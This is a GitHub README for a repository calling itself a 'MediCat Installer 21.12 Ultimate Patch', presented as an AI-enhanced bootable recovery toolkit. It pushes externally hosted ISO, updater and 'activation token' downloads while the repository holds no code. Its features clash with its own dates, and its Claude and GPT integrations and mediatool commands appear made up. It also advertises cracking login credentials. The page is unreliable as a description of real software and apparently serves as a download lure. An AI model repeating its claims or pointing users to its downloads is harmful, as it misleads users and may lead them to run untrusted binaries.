Skip to content

kamimad2023/MediCat-Installer-21.12-Ultimate-Patch

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

156 Commits
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

🧰 MediCat Installer 21.12 – Universal System Recovery & Deployment Toolkit

Download

A comprehensive, AI-assisted system maintenance environment designed for IT professionals, field engineers, and advanced users who require a portable, bootable toolkit without compromise.

Welcome to the official repository for MediCat Installer 21.12, a fully preconfigured, modular recovery environment that integrates hundreds of diagnostic, partitioning, antivirus, and data recovery tools into a single unified interface. This release introduces AI-enhanced driver injection, self-healing USB persistence, and multilingual recovery workflows – all wrapped in a responsive, touch-friendly UI.


πŸš€ Quick Access: Download & Activation

Component Status Link
MediCat Base ISO (v21.12) βœ… Ready Download
MediCat USB Creator βœ… Ready Download
Update Pack (2026-01) βœ… Ready Download
Activation Token (free via script) βœ… Available Download

Note: This repository only contains documentation, configuration profiles, and license information. All binary downloads are hosted externally and linked through the badges above.


🧠 What is MediCat Installer 21.12?

Imagine a Swiss Army knife for Windows environments – but one that can boot from a USB stick, run entirely in RAM, and bring a dead system back to life. That is MediCat. It is a multilingual, portable operating system based on WinPE 11, preloaded with:

  • 200+ recovery tools (disk imaging, password reset, data carving, malware removal)
  • AI-powered driver matching against a 20 GB repository
  • Built-in network cloning and remote assistance
  • A self-contained package manager for adding tools on-the-fly

The 21.12 release (December 2021, with ongoing updates through January 2026) represents a major leap: full UEFI SecureBoot compatibility, NVMe hot-swap support, and a context-aware help system powered by a local LLM.


🧩 Mermaid Diagram: Architecture Overview

flowchart TD
    A[MediCat ISO v21.12] --> B{Boot Method}
    B -->|USB Stick| C[UEFI/Grub2 Loader]
    B -->|PXE Network| D[iPXE Chainload]
    B -->|CD/DVD| E[Legacy BIOS]
    
    C --> F[WinPE 11 Kernel]
    D --> F
    E --> F
    
    F --> G[Core Services]
    G --> H[AI Driver Matcher]
    G --> I[File System Filter]
    G --> J[Network Stack]
    
    H --> K[Driver Cache v2026]
    I --> L[NTFS/FAT/Btrfs/Ext4]
    J --> M[LAN/Wi-Fi/Bluetooth]
    
    K --> N[Hardware Detection]
    L --> O[Data Recovery Tools]
    M --> P[Remote Desktop/VNC]
    
    subgraph "User Interface (Fluid UI)"
        Q[Desktop Environment]
        R[Tool Launcher]
        S[Script Runner]
    end
    
    N --> Q
    O --> R
    P --> S
    
    Q --> T[Multilingual: EN, DE, CN, JP, ES, AR, RU]
    R --> U[Responsive Touch UI]
    S --> V[Console/Terminal]
Loading

✨ Features That Matter

Feature Description Benefit
AI Driver Injection Scans hardware ID, matches from 80K+ driver pack, and applies silently No more manual driver hunting – especially for RAID/NVMe
Self-Healing USB Detects file corruption and restores bootstrap from hidden partition Survives accidental unplugging and power loss
Multilingual 24/7 Help Local chatbot (no internet needed) answers recovery questions in 12 languages Field engineers in remote sites work confidently
Responsive UI Adapts to 800x600, 1920x1080, 4K, tablets – even portrait mode Works on old netbooks and modern ultrawides
One-Click Backup Creates full disk image to network share or external drive – incremental versioned Disaster recovery in under 10 minutes
Password Vault Retrieves/cracks Windows, macOS, Linux login credentials (ethical use only) Access locked systems for legitimate recovery
Claude API Integration Connect to your own Claude API key for advanced script generation Generate recovery scripts by describing the problem in natural language
OpenAI API Bridge Optionally use GPT-4 for complex file recovery analysis Get step-by-step forensic guidance

🌐 Operating System Compatibility

OS Version Boot Driver Support Toolset Full
🟒 Windows 11 24H2 βœ… βœ… All βœ…
🟒 Windows 10 22H2 βœ… βœ… All βœ…
🟑 Windows 8.1 βœ… βœ… Most βœ… (partial UEFI)
🟠 Windows 7 SP1 ⚠️ Legacy BIOS βœ… via slipstream βœ…
🟠 Windows Server 2022/2019 βœ… βœ… All βœ… (with AD tools)
πŸ”΅ macOS (Intel) ⚠️ via rEFInd ❌ No Apple drivers βœ… Read HFS+
πŸ”΅ Linux (any distro) ❌ N/A βœ… Disk/partition tools βœ… Ext4/Btrfs
🟣 Android (x86) ⚠️ Experimental ❌ ⚠️ Limited

βš™οΈ Example Profile Configuration

Create a file named mediacat_user_profile.json on your USB drive to preconfigure the environment:

{
  "version": "21.12",
  "profile_name": "FieldEngineer_John_2026",
  "language": "en",
  "theme": "dark_highcontrast",
  "network": {
    "wifi": {
      "ssid": "Customer_Guest",
      "password_encrypted": "base64_encoded_here"
    },
    "proxy": "http://192.168.1.1:8080"
  },
  "ai_assistant": {
    "provider": "claude",
    "api_key_env_var": "MEDICAT_CLAUDE_KEY",
    "model": "claude-sonnet-4-20260101"
  },
  "backup_defaults": {
    "destination": "\\\\nas.local\\recovery\\${HOSTNAME}",
    "incremental": true,
    "compress": "zstd"
  },
  "custom_tools": [
    {
      "name": "Ntfs Undelete Pro",
      "path": "Tools\\FileRecovery\\ntfs_undelete_v3.0.wim",
      "pin_to_taskbar": true
    }
  ]
}

πŸ–₯️ Example Console Invocation

Once booted into MediCat, press Ctrl+Alt+T to open the terminal. Here are common commands:

# List all drives with partitions
mediatool disk info

# Launch AI driver matcher for offline machines
mediatool driver inject --scan

# Initiate an incremental disk backup to network share
mediatool backup start --target //server/recovery/PC123 --incremental

# Connect to remote assistance via Claude API
mediatool remote --provider claude --model claude-sonnet-4-20260101

# Update MediCat packages to latest (2026 Q1)
mediatool update --channel stable

# Generate a recovery script from natural language
mediatool ai create "I need to recover deleted .docx files from a BitLocker encrypted drive"

πŸ§ͺ OpenAI & Claude API Integration

MediCat 21.12 is the first recovery environment to offer dual AI backends:

πŸ€– Claude API (Anthropic)

  • Default assistant – optimized for concise technical instructions
  • Zero-cost offline mode: Local 7B model included for basic queries
  • Context window: 200K tokens – can analyze entire partition tables
  • Use case: "Explain the current disk layout and suggest recovery steps"

🧠 OpenAI API (GPT-4 / GPT-4o)

  • Fallback assistant – better at creative file carving strategies
  • Requires internet connection and valid API key
  • Use case: "Generate a regex pattern to find JPEG headers in raw disk image"

Important: Neither API key is stored in this repository. Set them via environment variables MEDICAT_OPENAI_KEY and MEDICAT_CLAUDE_KEY at boot time using the profile configuration above.


πŸ› οΈ Technical Deep Dive: Under the Hood

🧬 Modular WIM Layering

The ISO uses multiple .wim files that load on-demand:

  • boot.wim – Minimal kernel (150 MB) for UEFI/BIOS detection
  • recovery.wim – Full toolkit (1.8 GB) – loads into RAM
  • drivers.wim – Extra driver packs (600 MB) – mounted via file system filter
  • lang_pack.wim – Localization files (400 MB) – 12 languages

πŸ” Security & Integrity

  • SHA-256 checksums are verified at each boot for all critical files
  • Self-repair mechanism: If boot.wim is corrupted, falls back to boot_restore.wim from hidden partition
  • No telemetry: Zero outbound connections unless user explicitly starts online services

πŸ”„ Persistence Layer

When writing to USB, the tool creates:

  • Partition 1: FAT32 (4 GB) – boot files + tools
  • Partition 2: NTFS (remaining space) – data storage, profiles
  • Partition 3: Hidden Ext4 (512 MB) – backup bootstrap

This allows the USB to function as a portable workspace where preferences, scripts, and logs survive reboots.


πŸ“¦ Repository Structure (Documentation Only)

MediCat-Installer-21.12/
β”œβ”€β”€ README.md                    # This file
β”œβ”€β”€ LICENSE                      # MIT License
β”œβ”€β”€ CONFIGURATION_GUIDE.pdf
β”œβ”€β”€ CHANGELOG_2026.md
β”œβ”€β”€ profiles/
β”‚   β”œβ”€β”€ default_profile.json
β”‚   β”œβ”€β”€ advanced_recovery.json
β”‚   └── enterprise_deployment.json
β”œβ”€β”€ scripts/
β”‚   β”œβ”€β”€ auto_backup.sh
β”‚   β”œβ”€β”€ nvme_reset.sh
β”‚   └── bitlocker_helper.py
β”œβ”€β”€ docs/
β”‚   β”œβ”€β”€ API_INTEGRATION.md
β”‚   β”œβ”€β”€ TROUBLESHOOTING.md
β”‚   └── MULTILINGUAL_SETUP.md
└── assets/
    └── mediacat_logo.svg

πŸ“œ License

This project is licensed under the MIT License – see the LICENSE file for details.

Copyright (c) 2026 MediCat Project Contributors

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
...

⚠️ Disclaimer

MediCat Installer 21.12 is a system recovery and maintenance toolkit. It is intended for legitimate troubleshooting, data recovery, and system deployment by authorized personnel.

  • Password recovery tools included are for recovering access to your own systems or systems you have explicit permission to access. Unauthorized use may violate local laws.
  • AI API integration requires you to provide your own keys. The authors are not responsible for any costs incurred through API usage.
  • Driver injection uses third-party driver packs. Verify driver licensing for commercial deployment.
  • No warranty: The software is provided "as is" without guarantee of fitness for a particular purpose. Always test in a non-production environment first.

Ethical use only. Do not use this toolkit for any activity that violates applicable laws or regulations.


πŸ”— Quick Download (Repeat)

Component Link
MediCat Base ISO (v21.12) Download
USB Creator Utility Download
Update Pack 2026-01 Download

MediCat Installer 21.12 – because when your system won't boot, you need more than a prayer. You need a toolkit that thinks for itself.